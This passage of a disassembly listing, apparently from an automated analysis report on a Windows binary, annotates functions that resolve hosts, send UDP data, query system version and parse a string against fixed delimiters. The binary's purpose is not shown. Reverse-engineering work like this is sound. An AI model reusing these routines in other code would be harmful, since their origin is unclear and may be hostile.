00413FE7 lea eax, dword ptr [ebp-24h]
00413FEA call 0041399Ch
00413FEF push eax
00413FF0 lea eax, dword ptr [ebp-24h]
00413FF3 push eax
00413FF4 call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
00413FFA test eax, eax
00413FFC jne 0041400Fh
00413FFE mov eax, dword ptr [ebp-04h]
00414001 call 00404878h
00414006 mov edx, eax
00414008 mov eax, edi
0041400A call 004045D4h
0041400F xor eax, eax xrefs 00413FFC, 00413FA6, 00413FB1
00414011 pop edx
00414013 pop ecx Count = 2
00414014 mov dword ptr fs:[eax], edx
00414017 push 00414031h
0041401C lea eax, dword ptr [ebp-08h] xrefs 0041402F
0041401F mov edx, 00000002h
00414024 call 00404400h
00414029 ret function end
Function 004058F8, API count: 0, instr count: 10
Address Instruction Meta Information
004058F8 mov edx, dword ptr [eax] xrefs 0040383A, 00404DFF, 00413698, 004136C5
004058FA test edx, edx
004058FC je 0040590Ch
004058FE mov dword ptr [eax], 00000000h
00405904 push eax
00405905 push edx
00405906 mov eax, dword ptr [edx]
00405908 call dword ptr [eax+08h]
0040590B pop eax
0040590C ret xrefs 004058FC function end
Function 0040451C, API count: 1, instr count: 13
APIs
  • MultiByteToWideChar.KERNEL32, ref: 0040452E
Address Instruction Meta Information
0040451C push ebp xrefs 00404B31, 00404B03
0040451D mov ebp, esp
0040451F push edx
00404520 push eax
00404521 mov eax, dword ptr [ebp+08h]
00404524 push eax
00404525 push ecx
00404526 push 00000000h
00404528 mov eax, dword ptr [0042C5B8h] 00000003
0040452D push eax
0040452E call 004012A0h MultiByteToWideChar@KERNEL32.DLL (Hidden Import)
00404533 pop ebp
00404534 retn 0004h function end
Function 00413B08, API count: 1, instr count: 32
APIs
  • sendto.WS2_32, ref: 00413B3A
Address Instruction Meta Information
00413B08 push ebp xrefs 00419CA2
00413B09 mov ebp, esp
00413B0B add esp, FFFFFFE4h
00413B0E push ebx
00413B0F push esi
00413B10 push edi
00413B11 mov esi, dword ptr [ebp+08h]
00413B14 lea edi, dword ptr [ebp-1Ch]
00413B17 push ecx
00413B18 mov ecx, 00000007h
00413B1D rep movsd
00413B1F pop ecx
00413B20 mov edi, ecx
00413B22 mov esi, edx
00413B24 mov ebx, eax
00413B26 lea eax, dword ptr [ebp-1Ch]
00413B29 call 0041399Ch
00413B2E push eax
00413B2F lea eax, dword ptr [ebp-1Ch]
00413B32 push eax
00413B33 mov eax, dword ptr [ebp+0Ch]
00413B36 push eax
00413B37 push edi
00413B38 push esi
00413B39 push ebx
00413B3A call dword ptr [0042B3FCh] sendto@WS2_32.DLL (Hidden Import)
00413B40 pop edi
00413B41 pop esi
00413B42 pop ebx
00413B43 mov esp, ebp
00413B45 pop ebp
00413B46 retn 0008h function end
Function 00408C0C, API count: 1, instr count: 6
APIs
  • GetLocalTime.KERNEL32, ref: 00408C10
Address Instruction Meta Information
00408C0C add esp, FFFFFFF0h xrefs 00409A80, 00409CAB, 00409C70
00408C0F push esp
00408C10 call 004061B4h GetLocalTime@KERNEL32.DLL (Hidden Import)
00408C15 mov ax, word ptr [esp]
00408C19 add esp, 10h
00408C1C ret function end
Function 004134EC, API count: 1, instr count: 17
APIs
  • ResumeThread.KERNEL32, ref: 004134F4
Address Instruction Meta Information
004134EC push ebx xrefs 00422544, 0041327A, 004132C2
004134ED push esi
004134EE mov ebx, eax
004134F0 mov eax, dword ptr [ebx+04h]
004134F3 push eax
004134F4 call 0040626Ch ResumeThread@KERNEL32.DLL (Hidden Import)
004134F9 mov esi, eax
004134FB test esi, esi
004134FD setnl dl
00413500 mov eax, ebx
00413502 call 00413344h
00413507 dec esi
00413508 jne 0041350Eh
0041350A mov byte ptr [ebx+0Eh], 00000000h
0041350E pop esi xrefs 00413508
0041350F pop ebx
00413510 ret function end
Function 0040B380, API count: 1, instr count: 12
APIs
  • CharNextA.USER32, ref: 0040B38D
Address Instruction Meta Information
0040B380 push ebx xrefs 0040B413, 00409056, 0040B3D9
0040B381 mov ebx, eax
0040B383 cmp byte ptr [0042C744h], 00000000h
0040B38A je 0040B396h
0040B38C push ebx
0040B38D call 004062ACh CharNextA@USER32.DLL (Import)
0040B392 sub eax, ebx
0040B394 pop ebx
0040B395 ret function end
0040B396 mov eax, 00000001h xrefs 0040B38A
0040B39B pop ebx
0040B39C ret function end
Function 00414C90, API count: 1, instr count: 39
APIs
  • FreeLibrary.KERNEL32, ref: 00414CF4
Address Instruction Meta Information
00414C90 push ebp xrefs 0041C80A
00414C91 mov ebp, esp
00414C93 mov eax, dword ptr [0042C8A4h] 00960A4C
00414C98 call 00413914h
00414C9D xor eax, eax
00414C9F push ebp
00414CA0 push 00414D18h
00414CA5 push dword ptr fs:[eax]
00414CA8 mov dword ptr fs:[eax], esp
00414CAB dec dword ptr [0042B460h]
00414CB1 cmp dword ptr [0042B460h], 00000000h
00414CB8 jnl 00414CC1h
00414CBA xor eax, eax
00414CBC mov dword ptr [0042B460h], eax
00414CC1 cmp dword ptr [0042B460h], 00000000h xrefs 00414CB8
00414CC8 jne 00414D00h
00414CCA cmp dword ptr [0042B464h], 00000000h
00414CD1 je 00414CE5h
00414CD3 mov eax, dword ptr [0042B464h] 00000000
00414CD8 push eax
00414CD9 call 00406154h
00414CDE xor eax, eax
00414CE0 mov dword ptr [0042B464h], eax
00414CE5 cmp dword ptr [0042B468h], 00000000h xrefs 00414CD1
00414CEC je 00414D00h
00414CEE mov eax, dword ptr [0042B468h] 00000000
00414CF3 push eax
00414CF4 call 00406154h FreeLibrary@KERNEL32.DLL (Hidden Import)
00414CF9 xor eax, eax
00414CFB mov dword ptr [0042B468h], eax
00414D00 xor eax, eax xrefs 00414CC8, 00414CEC
00414D02 pop edx
00414D04 pop ecx Count = 2
00414D05 mov dword ptr fs:[eax], edx
00414D08 push 00414D1Fh
00414D0D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414D1D
00414D12 call 0041391Ch
00414D17 ret function end
Function 00413A10, API count: 1, instr count: 18
APIs
  • getsockname.WS2_32, ref: 00413A2D
Address Instruction Meta Information
00413A10 push ebx xrefs 004185C5
00413A11 push esi
00413A12 push ecx
00413A13 mov ebx, edx
00413A15 mov esi, eax
00413A17 mov dword ptr [esp], 0000001Ch
00413A1E mov eax, ebx
00413A20 xor ecx, ecx
00413A22 mov edx, dword ptr [esp]
00413A25 call 00403030h
00413A2A push esp
00413A2B push ebx
00413A2C push esi
00413A2D call dword ptr [0042B42Ch] getsockname@WS2_32.DLL (Hidden Import)
00413A33 pop edx
00413A34 pop esi
00413A35 pop ebx
00413A36 ret function end
Function 00405F94, API count: 1, instr count: 4
APIs
  • LocalAlloc.KERNEL32, ref: 00405F97
Address Instruction Meta Information
00405F94 push eax xrefs 00405FC9
00405F95 push 00000040h
00405F97 call 00405F7Ch LocalAlloc@KERNEL32.DLL (Hidden Import)
00405F9C ret function end
Function 00405FA8, API count: 1, instr count: 22
APIs
    • LocalAlloc.KERNEL32, ref: 00405F97
  • TlsSetValue.KERNEL32, ref: 00405FE5
Address Instruction Meta Information
00405FA8 push ebx xrefs 00406006
00405FA9 call 00405FA0h
00405FAE mov ebx, eax
00405FB0 test ebx, ebx
00405FB2 je 00405FEAh
00405FB4 cmp dword ptr [0042B0C4h], FFFFFFFFh
00405FBB jne 00405FC7h
00405FBD mov eax, 000000E2h
00405FC2 call 0040434Ch
00405FC7 mov eax, ebx xrefs 00405FBB
00405FC9 call 00405F94h
00405FCE test eax, eax
00405FD0 jne 00405FDEh
00405FD2 mov eax, 000000E2h
00405FD7 call 0040434Ch
00405FDC jmp 00405FEAh
00405FDE push eax xrefs 00405FD0
00405FDF mov eax, dword ptr [0042B0C4h] 00000000
00405FE4 push eax
00405FE5 call 00405F8Ch TlsSetValue@KERNEL32.DLL (Hidden Import)
00405FEA pop ebx xrefs 00405FB2, 00405FDC
00405FEB ret function end
Function 0040B5D4, API count: 1, instr count: 39
APIs
    • GetACP.KERNEL32, ref: 0040B59F
  • GetCPInfo.KERNEL32, ref: 0040B5ED
Address Instruction Meta Information
0040B5D4 push ebp xrefs 0040B791, 0040B6DF
0040B5D5 mov ebp, esp
0040B5D7 push ecx
0040B5D8 push ebx
0040B5D9 push esi
0040B5DA push edi
0040B5DB mov edi, dword ptr [ebp+08h]
0040B5DE add edi, FFFFFFECh
0040B5E1 push edi
0040B5E2 mov eax, dword ptr [0042C738h] 00000409
0040B5E7 call 0040B560h
0040B5EC push eax
0040B5ED call 0040617Ch GetCPInfo@KERNEL32.DLL (Hidden Import)
0040B5F2 xor esi, esi
0040B5F4 jmp 0040B61Fh
0040B5F6 mov al, byte ptr [edi+esi+06h] xrefs 0040B62C
0040B5FA mov bl, byte ptr [edi+esi+07h]
0040B5FE sub bl, al
0040B600 jc 0040B61Ch
0040B602 inc ebx
0040B603 mov byte ptr [ebp-01h], al
0040B606 mov al, byte ptr [ebp-01h] xrefs 0040B61A
0040B609 and eax, 000000FFh
0040B60E bts dword ptr [0042B130h], eax
0040B615 inc byte ptr [ebp-01h]
0040B618 dec bl
0040B61A jne 0040B606h
0040B61C add esi, 02h xrefs 0040B600
0040B61F cmp esi, 0Ch xrefs 0040B5F4
0040B622 jnl 0040B62Eh
0040B624 mov al, byte ptr [edi+esi+06h]
0040B628 or al, byte ptr [edi+esi+07h]
0040B62C jne 0040B5F6h
0040B62E pop edi xrefs 0040B622
0040B62F pop esi
0040B630 pop ebx
0040B631 pop ecx
0040B632 pop ebp
0040B633 ret function end
Function 0040B088, API count: 1, instr count: 26
APIs
  • GetVersionExA.KERNEL32, ref: 0040B096
Address Instruction Meta Information
0040B088 add esp, FFFFFF6Ch xrefs 0040C52B
0040B08E mov dword ptr [esp], 00000094h
0040B095 push esp
0040B096 call 004061FCh GetVersionExA@KERNEL32.DLL (Hidden Import)
0040B09B test eax, eax
0040B09D je 0040B0EFh
0040B09F mov eax, dword ptr [esp+10h]
0040B0A3 mov dword ptr [0042B0E8h], eax
0040B0A8 mov eax, dword ptr [esp+04h]
0040B0AC mov dword ptr [0042B0ECh], eax
0040B0B1 mov eax, dword ptr [esp+08h]
0040B0B5 mov dword ptr [0042B0F0h], eax
0040B0BA cmp dword ptr [0042B0E8h], 01h
0040B0C1 jne 0040B0D3h
0040B0C3 mov eax, dword ptr [esp+0Ch]
0040B0C7 and eax, 0000FFFFh
0040B0CC mov dword ptr [0042B0F4h], eax
0040B0D1 jmp 0040B0DCh
0040B0D3 mov eax, dword ptr [esp+0Ch] xrefs 0040B0C1
0040B0D7 mov dword ptr [0042B0F4h], eax
0040B0DC mov eax, 0042B0F8h xrefs 0040B0D1
0040B0E1 lea edx, dword ptr [esp+14h]
0040B0E5 mov ecx, 00000080h
0040B0EA call 0040464Ch
0040B0EF add esp, 00000094h xrefs 0040B09D
0040B0F5 ret function end
Function 00414078, API count: 5, instr count: 205
APIs
  • inet_addr.WS2_32, ref: 004140CB
  • gethostbyname.WS2_32, ref: 004140F1
  • getaddrinfo.WS2_32, ref: 004141D7
  • getnameinfo.WS2_32, ref: 00414245
  • FreeAddrInfoW.WS2_32, ref: 0041428E
Strings
  • 0.0.0.0, va: 0041430C
  • %d.%d.%d.%d, va: 004142F8
Address Instruction Meta Information
00414078 push ebp xrefs 00419808
00414079 mov ebp, esp
0041407B add esp, FFFFFFA4h
0041407E push ebx
0041407F push esi
00414080 push edi
00414081 xor ebx, ebx
00414083 mov dword ptr [ebp-0Ch], ebx
00414086 mov dword ptr [ebp-10h], ebx
00414089 mov dword ptr [ebp-18h], ebx
0041408C mov ebx, ecx
0041408E mov esi, edx
00414090 mov dword ptr [ebp-04h], eax
00414093 mov eax, dword ptr [ebp-04h]
00414096 call 00404868h
0041409B xor eax, eax
0041409D push ebp
0041409E push 004142E0h
004140A3 push dword ptr fs:[eax]
004140A6 mov dword ptr fs:[eax], esp
004140A9 mov eax, dword ptr [ebp+08h]
004140AC mov edx, dword ptr [eax]
004140AE call dword ptr [edx+44h]
004140B1 mov eax, esi
004140B3 call 00413B74h
004140B8 test al, al
004140BA jne 0041418Fh
004140C0 mov eax, dword ptr [ebp-04h]
004140C3 call 00404878h
004140C8 mov ebx, eax
004140CA push ebx
004140CB call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
004140D1 inc eax
004140D2 jne 0041417Fh
004140D8 mov eax, dword ptr [0042C8A4h] 00960A4C
004140DD call 00413914h
004140E2 xor edx, edx
004140E4 push ebp
004140E5 push 00414178h
004140EA push dword ptr fs:[edx]
004140ED mov dword ptr fs:[edx], esp
004140F0 push ebx
004140F1 call dword ptr [0042B3E4h] gethostbyname@WS2_32.DLL (Hidden Import)
004140F7 test eax, eax
004140F9 je 00414160h
004140FB mov esi, dword ptr [eax+0Ch]
004140FE xor ebx, ebx
00414100 jmp 00414159h
00414102 mov eax, dword ptr [eax] xrefs 0041415E
00414104 mov dword ptr [ebp-1Ch], eax
00414107 lea eax, dword ptr [ebp-18h]
0041410A push eax
0041410B xor eax, eax
0041410D mov al, byte ptr [ebp-1Ch]
00414110 mov dword ptr [ebp-5Ch], eax
00414113 mov byte ptr [ebp-58h], 00000000h
00414117 xor eax, eax
00414119 mov al, byte ptr [ebp-1Bh]
0041411C mov dword ptr [ebp-54h], eax
0041411F mov byte ptr [ebp-50h], 00000000h
00414123 xor eax, eax
00414125 mov al, byte ptr [ebp-1Ah]
00414128 mov dword ptr [ebp-4Ch], eax
0041412B mov byte ptr [ebp-48h], 00000000h
0041412F xor eax, eax
00414131 mov al, byte ptr [ebp-19h]
00414134 mov dword ptr [ebp-44h], eax
00414137 mov byte ptr [ebp-40h], 00000000h
0041413B lea edx, dword ptr [ebp-5Ch]
0041413E mov ecx, 00000003h
00414143 mov eax, 004142F8h ASCII "%d.%d.%d.%d"
00414148 call 00408048h
0041414D mov edx, dword ptr [ebp-18h]
00414150 mov eax, dword ptr [ebp+08h]
00414153 mov ecx, dword ptr [eax]
00414155 call dword ptr [ecx+38h]
00414158 inc ebx
00414159 mov eax, dword ptr [esi+ebx*4] xrefs 00414100
0041415C test eax, eax
0041415E jne 00414102h
00414160 xor eax, eax xrefs 004140F9
00414162 pop edx
00414164 pop ecx Count = 2
00414165 mov dword ptr fs:[eax], edx
00414168 push 0041429Ch
0041416D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 0041417D
00414172 call 0041391Ch
00414177 ret function end
0041417F mov edx, dword ptr [ebp-04h] xrefs 004140D2
00414182 mov eax, dword ptr [ebp+08h]
00414185 mov ecx, dword ptr [eax]
00414187 call dword ptr [ecx+38h]
0041418A jmp 0041429Ch
0041418F xor eax, eax xrefs 004140BA
00414191 mov dword ptr [ebp-08h], eax
00414194 xor edx, edx
00414196 push ebp
00414197 push 00414295h
0041419C push dword ptr fs:[edx]
0041419F mov dword ptr fs:[edx], esp
004141A2 lea eax, dword ptr [ebp-3Ch]
004141A5 xor ecx, ecx
004141A7 mov edx, 00000020h
004141AC call 00403030h
004141B1 xor eax, eax
004141B3 mov dword ptr [ebp-38h], eax
004141B6 mov eax, dword ptr [ebp+0Ch]
004141B9 mov dword ptr [ebp-34h], eax
004141BC mov dword ptr [ebp-30h], ebx
004141BF xor eax, eax
004141C1 mov dword ptr [ebp-3Ch], eax
004141C4 lea eax, dword ptr [ebp-08h]
004141C7 push eax
004141C8 lea eax, dword ptr [ebp-3Ch]
004141CB push eax
004141CC push 00000000h
004141CE mov eax, dword ptr [ebp-04h]
004141D1 call 00404878h
004141D6 push eax
004141D7 call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
004141DD test eax, eax
004141DF jne 00414277h
004141E5 mov ebx, dword ptr [ebp-08h]
004141E8 jmp 0041426Fh
004141ED cmp esi, 17h xrefs 00414271
004141F0 jne 004141F8h
004141F2 cmp dword ptr [ebx+04h], 02h
004141F6 je 0041426Ch
004141F8 cmp esi, 02h xrefs 004141F0
004141FB jne 00414203h
004141FD cmp dword ptr [ebx+04h], 17h
00414201 je 0041426Ch
00414203 mov edi, 00000401h xrefs 004141FB
00414208 mov dword ptr [ebp-14h], 00000020h
0041420F lea eax, dword ptr [ebp-0Ch]
00414212 mov edx, edi
00414214 call 004049A8h
00414219 lea eax, dword ptr [ebp-10h]
0041421C mov edx, dword ptr [ebp-14h]
0041421F call 004049A8h
00414224 push 0000000Ah
00414226 mov eax, dword ptr [ebp-14h]
00414229 push eax
0041422A mov eax, dword ptr [ebp-10h]
0041422D call 00404878h
00414232 push eax
00414233 push edi
00414234 mov eax, dword ptr [ebp-0Ch]
00414237 call 00404878h
0041423C push eax
0041423D mov eax, dword ptr [ebx+10h]
00414240 push eax
00414241 mov eax, dword ptr [ebx+18h]
00414244 push eax
00414245 call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
0041424B test eax, eax
0041424D jne 0041426Ch
0041424F mov eax, dword ptr [ebp-0Ch]
00414252 call 00404878h
00414257 mov edx, eax
00414259 lea eax, dword ptr [ebp-0Ch]
0041425C call 004045D4h
00414261 mov edx, dword ptr [ebp-0Ch]
00414264 mov eax, dword ptr [ebp+08h]
00414267 mov ecx, dword ptr [eax]
00414269 call dword ptr [ecx+38h]
0041426C mov ebx, dword ptr [ebx+1Ch] xrefs 0041424D, 00414201, 004141F6
0041426F test ebx, ebx xrefs 004141E8
00414271 jne 004141EDh
00414277 xor eax, eax xrefs 004141DF
00414279 pop edx
0041427B pop ecx Count = 2
0041427C mov dword ptr fs:[eax], edx
0041427F push 0041429Ch
00414284 cmp dword ptr [ebp-08h], 00000000h xrefs 0041429A
00414288 je 00414294h
0041428A mov eax, dword ptr [ebp-08h]
0041428D push eax
0041428E call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414294 ret xrefs 00414288 function end
0041429C mov eax, dword ptr [ebp+08h] xrefs 0041418A
0041429F mov edx, dword ptr [eax]
004142A1 call dword ptr [edx+14h]
004142A4 test eax, eax
004142A6 jne 004142B5h
004142A8 mov edx, 0041430Ch ASCII "0.0.0.0"
004142AD mov eax, dword ptr [ebp+08h]
004142B0 mov ecx, dword ptr [eax]
004142B2 call dword ptr [ecx+38h]
004142B5 xor eax, eax xrefs 004142A6
004142B7 pop edx
004142B9 pop ecx Count = 2
004142BA mov dword ptr fs:[eax], edx
004142BD push 004142E7h
004142C2 lea eax, dword ptr [ebp-18h] xrefs 004142E5
004142C5 call 004043DCh
004142CA lea eax, dword ptr [ebp-10h]
004142CD mov edx, 00000002h
004142D2 call 00404400h
004142D7 lea eax, dword ptr [ebp-04h]
004142DA call 004043DCh
004142DF ret function end
Function 004291FC, API count: 1, instr count: 396
APIs
    • QueryPerformanceCounter.KERNEL32, ref: 00402A20
    • GetTickCount.KERNEL32, ref: 00402A34
  • Sleep.KERNEL32, ref: 0042975A
Address Instruction Meta Information
004291FC push ebp
004291FD mov ebp, esp
004291FF mov ecx, 0000000Eh
00429206 push 00000000h Count = 2
00429208 dec ecx
00429209 jne 00429204h
0042920B push ecx
0042920C push ebx
0042920D push esi
0042920E push edi
0042920F xor edx, edx
00429211 push ebp
00429212 push 00429798h
00429217 push dword ptr fs:[edx]
0042921A mov dword ptr fs:[edx], esp
0042921D mov byte ptr [eax+0Fh], 00000001h
00429221 mov dl, 01h
00429223 mov eax, dword ptr [0040FD08h] 0040FD54
00429228 call 004036D8h
0042922D mov dword ptr [0042DA80h], eax
00429232 mov dword ptr [ebp-0Ch], 000000B4h
00429239 mov eax, dword ptr [ebp-0Ch]
0042923C mov dword ptr [ebp-08h], eax
0042923F xor eax, eax
00429241 mov dword ptr [0042DA6Ch], eax
00429246 xor eax, eax
00429248 mov dword ptr [0042DA90h], eax
0042924D xor eax, eax
0042924F mov dword ptr [0042DA94h], eax
00429254 xor eax, eax
00429256 mov dword ptr [0042DA98h], eax
0042925B call 00402A1Ch
00429260 xor eax, eax xrefs 0042975F
00429262 push ebp
00429263 push 00429748h
00429268 push dword ptr fs:[eax]
0042926B mov dword ptr fs:[eax], esp
0042926E mov dl, 01h
00429270 mov eax, dword ptr [0040FD08h] 0040FD54
00429275 call 004036D8h
0042927A mov dword ptr [ebp-04h], eax
0042927D lea edx, dword ptr [ebp-1Ch]
00429280 mov eax, dword ptr [0042DA88h] 00000000
00429285 call 00429030h
0042928A mov edx, dword ptr [ebp-1Ch]
0042928D mov eax, dword ptr [ebp-04h]
00429290 mov ecx, dword ptr [eax]
00429292 call dword ptr [ecx+2Ch]
00429295 lea edx, dword ptr [ebp-20h]
00429298 mov eax, dword ptr [ebp-04h]
0042929B mov ecx, dword ptr [eax]
0042929D call dword ptr [ecx+1Ch]
004292A0 mov edx, dword ptr [ebp-20h]
004292A3 mov eax, 004297B0h
004292A8 call 00404960h
004292AD cmp eax, 03h
004292B0 jne 00429724h
004292B6 xor eax, eax
004292B8 push ebp
004292B9 push 004292F9h
004292BE push dword ptr fs:[eax]
004292C1 mov dword ptr fs:[eax], esp
004292C4 lea eax, dword ptr [ebp-24h]
004292C7 push eax
004292C8 lea edx, dword ptr [ebp-28h]
004292CB mov eax, dword ptr [ebp-04h]
004292CE mov ecx, dword ptr [eax]
004292D0 call dword ptr [ecx+1Ch]
004292D3 mov eax, dword ptr [ebp-28h]
004292D6 mov ecx, 00000001h
004292DB xor edx, edx
004292DD call 004048D8h
004292E2 mov eax, dword ptr [ebp-24h]
004292E5 call 00422574h
004292EA mov dword ptr [0042DA68h], eax
004292EF xor eax, eax
004292F1 pop edx
004292F3 pop ecx Count = 2
004292F4 mov dword ptr fs:[eax], edx
004292F7 jmp 00429303h
00429303 xor eax, eax xrefs 004292F7
00429305 push ebp
00429306 push 00429349h
0042930B push dword ptr fs:[eax]
0042930E mov dword ptr fs:[eax], esp
00429311 lea eax, dword ptr [ebp-2Ch]
00429314 push eax
00429315 lea edx, dword ptr [ebp-30h]
00429318 mov eax, dword ptr [ebp-04h]
0042931B mov ecx, dword ptr [eax]
0042931D call dword ptr [ecx+1Ch]
00429320 mov eax, dword ptr [ebp-30h]
00429323 mov ecx, 00000001h
00429328 mov edx, 00000002h
0042932D call 004048D8h
00429332 mov eax, dword ptr [ebp-2Ch]
00429335 call 00422574h
0042933A mov dword ptr [0042DA8Ch], eax
0042933F xor eax, eax
00429341 pop edx
00429343 pop ecx Count = 2
00429344 mov dword ptr fs:[eax], edx
00429347 jmp 0042935Dh
0042935D lea eax, dword ptr [ebp-34h] xrefs 00429347
00429360 push eax
00429361 lea edx, dword ptr [ebp-38h]
00429364 mov eax, dword ptr [ebp-04h]
00429367 mov ecx, dword ptr [eax]
00429369 call dword ptr [ecx+1Ch]
0042936C mov eax, dword ptr [ebp-38h]
0042936F call 00404678h
00429374 sub eax, 04h
00429377 push eax
00429378 lea edx, dword ptr [ebp-3Ch]
0042937B mov eax, dword ptr [ebp-04h]
0042937E mov ecx, dword ptr [eax]
00429380 call dword ptr [ecx+1Ch]
00429383 mov eax, dword ptr [ebp-3Ch]
00429386 mov edx, 00000004h
0042938B pop ecx
0042938C call 004048D8h
00429391 mov edx, dword ptr [ebp-34h]
00429394 mov eax, dword ptr [ebp-04h]
00429397 mov ecx, dword ptr [eax]
00429399 call dword ptr [ecx+2Ch]
0042939C xor eax, eax
0042939E push ebp
0042939F push 004293F5h
004293A4 push dword ptr fs:[eax]
004293A7 mov dword ptr fs:[eax], esp
004293AA lea eax, dword ptr [ebp-40h]
004293AD push eax
004293AE lea edx, dword ptr [ebp-44h]
004293B1 mov eax, dword ptr [ebp-04h]
004293B4 mov ecx, dword ptr [eax]
004293B6 call dword ptr [ecx+1Ch]
004293B9 mov edx, dword ptr [ebp-44h]
004293BC mov eax, 004297B0h
004293C1 call 00404960h
004293C6 dec eax
004293C7 push eax
004293C8 lea edx, dword ptr [ebp-48h]
004293CB mov eax, dword ptr [ebp-04h]
004293CE mov ecx, dword ptr [eax]
004293D0 call dword ptr [ecx+1Ch]
004293D3 mov eax, dword ptr [ebp-48h]
004293D6 xor edx, edx
004293D8 pop ecx
004293D9 call 004048D8h
004293DE mov eax, dword ptr [ebp-40h]
004293E1 call 00422574h
004293E6 mov dword ptr [0042DA74h], eax
004293EB xor eax, eax
004293ED pop edx
004293EF pop ecx Count = 2
004293F0 mov dword ptr fs:[eax], edx
004293F3 jmp 00429406h
00429406 lea eax, dword ptr [ebp-4Ch] xrefs 004293F3
00429409 push eax
0042940A lea edx, dword ptr [ebp-50h]
0042940D mov eax, dword ptr [ebp-04h]
00429410 mov ecx, dword ptr [eax]
00429412 call dword ptr [ecx+1Ch]
00429415 mov eax, dword ptr [ebp-50h]
00429418 call 00404678h
0042941D mov ebx, eax
0042941F lea edx, dword ptr [ebp-54h]
00429422 mov eax, dword ptr [ebp-04h]
00429425 mov ecx, dword ptr [eax]
00429427 call dword ptr [ecx+1Ch]
0042942A mov edx, dword ptr [ebp-54h]
0042942D mov eax, 004297B0h
00429432 call 00404960h
00429437 sub ebx, eax
00429439 push ebx
0042943A lea edx, dword ptr [ebp-58h]
0042943D mov eax, dword ptr [ebp-04h]
00429440 mov ecx, dword ptr [eax]
00429442 call dword ptr [ecx+1Ch]
00429445 mov edx, dword ptr [ebp-58h]
00429448 mov eax, 004297B0h
0042944D call 00404960h
00429452 inc eax
00429453 push eax
00429454 lea edx, dword ptr [ebp-5Ch]
00429457 mov eax, dword ptr [ebp-04h]
0042945A mov ecx, dword ptr [eax]
0042945C call dword ptr [ecx+1Ch]
0042945F mov eax, dword ptr [ebp-5Ch]
00429462 pop edx
00429463 pop ecx
00429464 call 004048D8h
00429469 mov edx, dword ptr [ebp-4Ch]
0042946C mov eax, dword ptr [ebp-04h]
0042946F mov ecx, dword ptr [eax]
00429471 call dword ptr [ecx+2Ch]
00429474 xor eax, eax
00429476 mov dword ptr [ebp-18h], eax
00429479 lea eax, dword ptr [ebp-14h]
0042947C push eax
0042947D lea edx, dword ptr [ebp-60h]
00429480 mov eax, dword ptr [ebp-04h]
00429483 mov ecx, dword ptr [eax]
00429485 call dword ptr [ecx+1Ch]
00429488 mov eax, dword ptr [ebp-60h]
0042948B mov ecx, 00000001h
00429490 mov edx, dword ptr [ebp-18h]
00429493 call 004048D8h
00429498 jmp 004294BCh
0042949A inc dword ptr [ebp-18h] xrefs 004294C9, 004294D8, 004294E7, 004294F6, 00429505, 00429514, 00429523, 00429536, 00429549, 0042955C
0042949D lea eax, dword ptr [ebp-14h]
004294A0 push eax
004294A1 lea edx, dword ptr [ebp-64h]
004294A4 mov eax, dword ptr [ebp-04h]
004294A7 mov ecx, dword ptr [eax]
004294A9 call dword ptr [ecx+1Ch]
004294AC mov eax, dword ptr [ebp-64h]
004294AF mov ecx, 00000001h
004294B4 mov edx, dword ptr [ebp-18h]
004294B7 call 004048D8h
004294BC mov eax, dword ptr [ebp-14h] xrefs 00429498
004294BF mov edx, 004297BCh
004294C4 call 004047C4h
004294C9 je 0042949Ah
004294CB mov eax, dword ptr [ebp-14h]
004294CE mov edx, 004297C8h
004294D3 call 004047C4h
004294D8 je 0042949Ah
004294DA mov eax, dword ptr [ebp-14h]
004294DD mov edx, 004297D4h
004294E2 call 004047C4h
004294E7 je 0042949Ah
004294E9 mov eax, dword ptr [ebp-14h]
004294EC mov edx, 004297E0h
004294F1 call 004047C4h
004294F6 je 0042949Ah
004294F8 mov eax, dword ptr [ebp-14h]
004294FB mov edx, 004297ECh
00429500 call 004047C4h
00429505 je 0042949Ah
00429507 mov eax, dword ptr [ebp-14h]
0042950A mov edx, 004297F8h
0042950F call 004047C4h
00429514 je 0042949Ah
00429516 mov eax, dword ptr [ebp-14h]
00429519 mov edx, 00429804h
0042951E call 004047C4h
00429523 je 0042949Ah
00429529 mov eax, dword ptr [ebp-14h]
0042952C mov edx, 00429810h
00429531 call 004047C4h
00429536 je 0042949Ah
0042953C mov eax, dword ptr [ebp-14h]
0042953F mov edx, 0042981Ch
00429544 call 004047C4h
00429549 je 0042949Ah
0042954F mov eax, dword ptr [ebp-14h]
00429552 mov edx, 00429828h
00429557 call 004047C4h
0042955C je 0042949Ah
00429562 dec dword ptr [ebp-18h]
00429565 xor eax, eax
00429567 push ebp
00429568 push 004295A4h
0042956D push dword ptr fs:[eax]
00429570 mov dword ptr fs:[eax], esp
00429573 lea eax, dword ptr [ebp-68h]
00429576 push eax
00429577 lea edx, dword ptr [ebp-6Ch]
0042957A mov eax, dword ptr [ebp-04h]
0042957D mov ecx, dword ptr [eax]
0042957F call dword ptr [ecx+1Ch]
00429582 mov eax, dword ptr [ebp-6Ch]
00429585 mov ecx, dword ptr [ebp-18h]
00429588 xor edx, edx
0042958A call 004048D8h
0042958F mov eax, dword ptr [ebp-68h]
00429592 call 00422574h
00429597 mov dword ptr [ebp-08h], eax
0042959A xor eax, eax
0042959C pop edx
0042959E pop ecx Count = 2
0042959F mov dword ptr fs:[eax], edx
004295A2 jmp 004295B4h
004295B4 lea eax, dword ptr [ebp-10h] xrefs 004295A2
004295B7 push eax
004295B8 lea edx, dword ptr [ebp-70h]
004295BB mov eax, dword ptr [ebp-04h]
004295BE mov ecx, dword ptr [eax]
004295C0 call dword ptr [ecx+1Ch]
004295C3 mov eax, dword ptr [ebp-70h]
004295C6 call 00404678h
004295CB sub eax, dword ptr [ebp-18h]
004295CE sub eax, 02h
004295D1 push eax
004295D2 lea edx, dword ptr [ebp-74h]
004295D5 mov eax, dword ptr [ebp-04h]
004295D8 mov ecx, dword ptr [eax]
004295DA call dword ptr [ecx+1Ch]
004295DD mov eax, dword ptr [ebp-74h]
004295E0 mov edx, dword ptr [ebp-18h]
004295E3 inc edx
004295E4 pop ecx
004295E5 call 004048D8h
004295EA xor eax, eax
004295EC push ebp
004295ED push 0042970Eh
004295F2 push dword ptr fs:[eax]
